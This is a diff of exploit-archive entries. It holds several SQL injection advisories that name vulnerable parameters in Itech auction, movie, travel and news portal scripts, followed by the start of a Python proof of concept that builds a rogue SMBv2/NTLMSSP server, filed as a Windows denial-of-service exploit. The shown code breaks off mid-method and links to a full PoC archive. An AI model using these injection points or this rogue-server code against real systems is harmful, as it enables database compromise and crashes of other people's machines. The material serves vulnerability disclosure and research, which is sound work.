+# Vendor Homepage: http://itechscripts.com/
+# Software Buy: http://itechscripts.com/news-portal-script/
+# Demo: http://news-portal.itechscripts.com/
+# Version: 6.28
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/subcategory.php?sc=[SQL]
+# E.t.c.
+# # # # #

platforms/php/webapps/41229.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Itech Auction Script v6.49 – 'pid' Parameter SQL Injection
+# Google Dork: N/A
+# Date: 02.02.2017
+# Vendor Homepage: http://itechscripts.com/
+# Software Buy: http://itechscripts.com/auction-script/
+# Demo: http://auction.itechscripts.com/
+# Version: 6.49
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/ajax-files/list_photo.php?pid=[SQL]
+# E.t.c.
+# # # # #

platforms/php/webapps/41230.txt

@@ -0,0 +1,21 @@
+# # # # # 
+# Exploit Title: Itech Movie Portal Script v7.37 - SQL Injection
+# Google Dork: N/A
+# Date: 02.02.2017
+# Vendor Homepage: http://itechscripts.com/
+# Software Buy: http://itechscripts.com/movie-portal-script/
+# Demo: http://movie-portal.itechscripts.com
+# Version: 7.27
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/faq_show.php?fid=[SQL]
+# http://localhost/[PATH]/cms.php?id=[SQL]
+# http://localhost/[PATH]/show_news.php?id=[SQL]
+# http://localhost/[PATH]/show_misc_video.php?id=[SQL]
+# E.t.c... E.t.c...
+# # # # #

platforms/php/webapps/41231.txt

@@ -0,0 +1,21 @@
+# # # # # 
+# Exploit Title: Itech Travel Portal Script v9.35 - SQL Injection
+# Google Dork: N/A
+# Date: 02.02.2017
+# Vendor Homepage: http://itechscripts.com/
+# Software Buy: http://www.itechscripts.com/travel-portal-script/
+# Demo: http://travel.itechscripts.com/
+# Version: 9.35
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/pages.php?id=[SQL]
+# http://localhost/[PATH]/content.php?id=[SQL]
+# http://localhost/[PATH]/faq_show.php?fid=[SQL]
+# http://localhost/[PATH]/showCity.php?q=[SQL]
+# E.t.c... E.t.c...
+# # # # #

platforms/windows/dos/41222.py

@@ -0,0 +1,427 @@
+# Full Proof of Concept: 
+# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41222.zip
+
+import sys, struct, SocketServer
+from odict import OrderedDict
+from datetime import datetime
+from calendar import timegm
+
+class Packet():
+    fields = OrderedDict([
+        ("data", ""),
+    ])
+    def __init__(self, **kw):
+        self.fields = OrderedDict(self.__class__.fields)
+        for k,v in kw.items():
+            if callable(v):
+                self.fields[k] = v(self.fields[k])
+            else:
+                self.fields[k] = v
+    def __str__(self):
+        return "".join(map(str, self.fields.values()))
+
+def NTStamp(Time):
+    NtStamp = 116444736000000000 + (timegm(Time.timetuple()) * 10000000)
+    return struct.pack("Q", NtStamp + (Time.microsecond * 10))
+
+def longueur(payload):
+    length = struct.pack(">i", len(''.join(payload)))
+    return length
+
+def GrabMessageID(data):
+    Messageid = data[28:36]
+    return Messageid
+
+def GrabCreditRequested(data):
+    CreditsRequested = data[18:20]
+    if CreditsRequested == "\x00\x00":
+       CreditsRequested =  "\x01\x00"
+    else:
+       CreditsRequested = data[18:20]
+    return CreditsRequested
+
+def GrabCreditCharged(data):
+    CreditCharged = data[10:12]
+    return CreditCharged
+
+def GrabSessionID(data):
+    SessionID = data[44:52]
+    return SessionID
+
+##################################################################################
+class SMBv2Header(Packet):
+    fields = OrderedDict([
+        ("Proto",         "\xfe\x53\x4d\x42"),
+        ("Len",           "\x40\x00"),
+        ("CreditCharge",  "\x00\x00"),
+        ("NTStatus",      "\x00\x00\x00\x00"),
+        ("Cmd",           "\x00\x00"),
+        ("Credits",       "\x01\x00"),
+        ("Flags",         "\x01\x00\x00\x00"),
+        ("NextCmd",       "\x00\x00\x00\x00"),
+        ("MessageId",     "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("PID",           "\xff\xfe\x00\x00"),
+        ("TID",           "\x00\x00\x00\x00"),
+        ("SessionID",     "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("Signature",     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
+    ])
+
+##################################################################################
+class SMB2NegoAns(Packet):
+	fields = OrderedDict([
+		("Len",             "\x41\x00"),
+		("Signing",         "\x01\x00"),
+		("Dialect",         "\xff\x02"),
+		("Reserved",        "\x00\x00"),
+		("Guid",            "\xea\x85\xab\xf1\xea\xf6\x0c\x4f\x92\x81\x92\x47\x6d\xeb\x72\xa9"),
+		("Capabilities",    "\x07\x00\x00\x00"),
+		("MaxTransSize",    "\x00\x00\x10\x00"),
+		("MaxReadSize",     "\x00\x00\x10\x00"),
+		("MaxWriteSize",    "\x00\x00\x10\x00"),
+		("SystemTime",      NTStamp(datetime.now())),
+		("BootTime",        "\x22\xfb\x80\x01\x40\x09\xd2\x01"),
+		("SecBlobOffSet",             "\x80\x00"),
+		("SecBlobLen",                "\x78\x00"),
+		("Reserved2",                 "\x4d\x53\x53\x50"),
+		("InitContextTokenASNId",     "\x60"),
+		("InitContextTokenASNLen",    "\x76"),
+		("ThisMechASNId",             "\x06"),
+		("ThisMechASNLen",            "\x06"),
+		("ThisMechASNStr",            "\x2b\x06\x01\x05\x05\x02"),
+		("SpNegoTokenASNId",          "\xA0"),
+		("SpNegoTokenASNLen",         "\x6c"),
+		("NegTokenASNId",             "\x30"),
+		("NegTokenASNLen",            "\x6a"),
+		("NegTokenTag0ASNId",         "\xA0"),
+		("NegTokenTag0ASNLen",        "\x3c"),
+		("NegThisMechASNId",          "\x30"),
+		("NegThisMechASNLen",         "\x3a"),
+		("NegThisMech1ASNId",         "\x06"),
+		("NegThisMech1ASNLen",        "\x0a"),
+		("NegThisMech1ASNStr",        "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e"),
+		("NegThisMech2ASNId",         "\x06"),
+		("NegThisMech2ASNLen",        "\x09"),
+		("NegThisMech2ASNStr",        "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"),
+		("NegThisMech3ASNId",         "\x06"),
+		("NegThisMech3ASNLen",        "\x09"),
+		("NegThisMech3ASNStr",        "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"),
+		("NegThisMech4ASNId",         "\x06"),
+		("NegThisMech4ASNLen",        "\x0a"),
+		("NegThisMech4ASNStr",        "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"),
+		("NegThisMech5ASNId",         "\x06"),
+		("NegThisMech5ASNLen",        "\x0a"),
+		("NegThisMech5ASNStr",        "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
+		("NegTokenTag3ASNId",         "\xA3"),
+		("NegTokenTag3ASNLen",        "\x2a"),
+		("NegHintASNId",              "\x30"),
+		("NegHintASNLen",             "\x28"),
+		("NegHintTag0ASNId",          "\xa0"),
+		("NegHintTag0ASNLen",         "\x26"),
+		("NegHintFinalASNId",         "\x1b"), 
+		("NegHintFinalASNLen",        "\x24"),
+		("NegHintFinalASNStr",        "Server2009@SMB3.local"),
+		("Data",                      ""),
+	])
+
+	def calculate(self):
+
+
+		StructLen = str(self.fields["Len"])+str(self.fields["Signing"])+str(self.fields["Dialect"])+str(self.fields["Reserved"])+str(self.fields["Guid"])+str(self.fields["Capabilities"])+str(self.fields["MaxTransSize"])+str(self.fields["MaxReadSize"])+str(self.fields["MaxWriteSize"])+str(self.fields["SystemTime"])+str(self.fields["BootTime"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])+str(self.fields["Reserved2"])
+                 
+		SecBlobLen = str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
+
+
+		AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
+
+		AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
+
+		MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])
+
+		Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
+
+                #Sec Blob lens
+		self.fields["SecBlobOffSet"] = struct.pack("<h",len(StructLen)+64)
+		self.fields["SecBlobLen"] = struct.pack("<h",len(SecBlobLen))
+                #ASN Stuff
+		self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(SecBlobLen)-2)
+		self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"])))
+		self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
+		self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2)
+		self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
+		self.fields["NegThisMech1ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech1ASNStr"])))
+		self.fields["NegThisMech2ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech2ASNStr"])))
+		self.fields["NegThisMech3ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech3ASNStr"])))
+		self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"])))
+		self.fields["NegThisMech5ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech5ASNStr"])))
+		self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
+		self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2)
+		self.fields["NegHintTag0ASNLen"] = struct.pack("<B", len(Tag3Len)-4)
+		self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"])))
+
+##################################################################################
+class SMB2Session1Data(Packet):
+	fields = OrderedDict([
+		("Len",             "\x09\x00"),
+		("SessionFlag",     "\x01\x00"),
+		("SecBlobOffSet",   "\x48\x00"),
+		("SecBlobLen",      "\x06\x01"),
+		("ChoiceTagASNId",        "\xa1"), 
+		("ChoiceTagASNLenOfLen",  "\x82"), 
+		("ChoiceTagASNIdLen",     "\x01\x02"),
+		("NegTokenTagASNId",      "\x30"),
+		("NegTokenTagASNLenOfLen","\x81"),
+		("NegTokenTagASNIdLen",   "\xff"),
+		("Tag0ASNId",             "\xA0"),
+		("Tag0ASNIdLen",          "\x03"),
+		("NegoStateASNId",        "\x0A"),
+		("NegoStateASNLen",       "\x01"),
+		("NegoStateASNValue",     "\x01"),
+		("Tag1ASNId",             "\xA1"),
+		("Tag1ASNIdLen",          "\x0c"),
+		("Tag1ASNId2",            "\x06"),
+		("Tag1ASNId2Len",         "\x0A"),
+		("Tag1ASNId2Str",         "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
+		("Tag2ASNId",             "\xA2"),
+		("Tag2ASNIdLenOfLen",     "\x81"),
+		("Tag2ASNIdLen",          "\xE9"),
+		("Tag3ASNId",             "\x04"),
+		("Tag3ASNIdLenOfLen",     "\x81"),
+		("Tag3ASNIdLen",          "\xE6"),
+		("NTLMSSPSignature",      "NTLMSSP"),
+		("NTLMSSPSignatureNull",  "\x00"),
+		("NTLMSSPMessageType",    "\x02\x00\x00\x00"),
+		("NTLMSSPNtWorkstationLen","\x1e\x00"),
+		("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
+		("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
+		("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
+		("NTLMSSPNtServerChallenge","\x82\x21\x32\x14\x51\x46\xe2\x83"),
+		("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
+		("NTLMSSPNtTargetInfoLen","\x94\x00"),
+		("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
+		("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
+		("NegTokenInitSeqMechMessageVersionHigh","\x06"),
+		("NegTokenInitSeqMechMessageVersionLow","\x03"),
+		("NegTokenInitSeqMechMessageVersionBuilt","\x80\x25"),
+		("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
+		("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
+		("NTLMSSPNtWorkstationName","SMB3"),
+		("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
+		("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
+		("NTLMSSPNTLMChallengeAVPairsUnicodeStr","SMB5"),
+		("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
+		("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
+		("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","WIN-PRH502RQAFV"), 
+		("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
+		("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
+		("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","SMB5.local"), 
+		("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
+		("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
+		("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","WIN-PRH502RQAFV.SMB5.local"),
+		("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
+		("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
+		("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","SMB5.local"),
+		("NTLMSSPNTLMChallengeAVPairs7Id","\x07\x00"),
+		("NTLMSSPNTLMChallengeAVPairs7Len","\x08\x00"),
+		("NTLMSSPNTLMChallengeAVPairs7UnicodeStr",NTStamp(datetime.now())),
+		("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
+		("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"),
+	])
+
+
+	def calculate(self):
+		###### Convert strings to Unicode
+		self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
+		self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
+		self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
+		self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
+		self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
+		self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
+                
+                #Packet struct calc:
+		StructLen = str(self.fields["Len"])+str(self.fields["SessionFlag"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])
+		###### SecBlobLen Calc:
+		CalculateSecBlob = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NTLMSSPNtWorkstationName"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
+
+		AsnLen = str(self.fields["ChoiceTagASNId"])+str(self.fields["ChoiceTagASNLenOfLen"])+str(self.fields["ChoiceTagASNIdLen"])+str(self.fields["NegTokenTagASNId"])+str(self.fields["NegTokenTagASNLenOfLen"])+str(self.fields["NegTokenTagASNIdLen"])+str(self.fields["Tag0ASNId"])+str(self.fields["Tag0ASNIdLen"])+str(self.fields["NegoStateASNId"])+str(self.fields["NegoStateASNLen"])+str(self.fields["NegoStateASNValue"])+str(self.fields["Tag1ASNId"])+str(self.fields["Tag1ASNIdLen"])+str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])+str(self.fields["Tag2ASNId"])+str(self.fields["Tag2ASNIdLenOfLen"])+str(self.fields["Tag2ASNIdLen"])+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])
+
+
+                #Packet Struct len
+		self.fields["SecBlobLen"] = struct.pack("<H", len(AsnLen+CalculateSecBlob))
+                self.fields["SecBlobOffSet"] = struct.pack("<h",len(StructLen)+64)
+
+		###### ASN Stuff
+                if len(CalculateSecBlob) > 255:
+		   self.fields["Tag3ASNIdLen"] = struct.pack(">H", len(CalculateSecBlob))
+                else:
+                   self.fields["Tag3ASNIdLenOfLen"] = "\x81"
+		   self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob))
+
+                if len(AsnLen+CalculateSecBlob)-3 > 255:
+		   self.fields["ChoiceTagASNIdLen"] = struct.pack(">H", len(AsnLen+CalculateSecBlob)-4)
+                else:
+                   self.fields["ChoiceTagASNLenOfLen"] = "\x81"
+		   self.fields["ChoiceTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-3)
+
+                if len(AsnLen+CalculateSecBlob)-7 > 255:
+		   self.fields["NegTokenTagASNIdLen"] = struct.pack(">H", len(AsnLen+CalculateSecBlob)-8)
+                else:
+                   self.fields["NegTokenTagASNLenOfLen"] = "\x81"
+		   self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-7)
+                
+                tag2length = CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])
+
+                if len(tag2length) > 255:
+		   self.fields["Tag2ASNIdLen"] = struct.pack(">H", len(tag2length))
+                else:
+                   self.fields["Tag2ASNIdLenOfLen"] = "\x81"
+		   self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(tag2length))
+
+		self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])))
+		self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"])))
+
+		###### Workstation Offset
+		CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
+
+		###### AvPairs Offset
+		CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
+
+		##### Workstation Offset Calculation:
+		self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
+		self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
+		self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
+
+		##### Target Offset Calculation:
+		self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
+		self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
+		self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
+		
+		##### IvPair Calculation:
+		self.fields["NTLMSSPNTLMChallengeAVPairs7Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])))
+		self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
+		self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
+		self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
